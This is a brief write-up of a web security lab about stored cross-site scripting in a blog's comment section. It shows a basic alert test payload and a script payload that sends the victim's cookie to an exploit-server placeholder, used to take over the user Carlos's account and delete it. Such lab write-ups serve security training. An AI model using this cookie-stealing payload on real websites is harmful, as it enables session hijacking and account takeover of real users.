Lab link.
We see that our lab description contains XSS. At first, we look at the cookie value used in the system.
We find a forum on the blog page to organize our XSS attack. Here we first try a basic XSS payload to see if it is XSS.
<script>alert(1);</script>
We have found our XSS vulnerability in the system, now we will pull the cookie value using our exploit server given to us in the lab, our payload we will use for this:
<script>document.location=‘exploit-server-URL’+document.cookie</script>
We access the cookies of the user Carlos and enter and delete the account.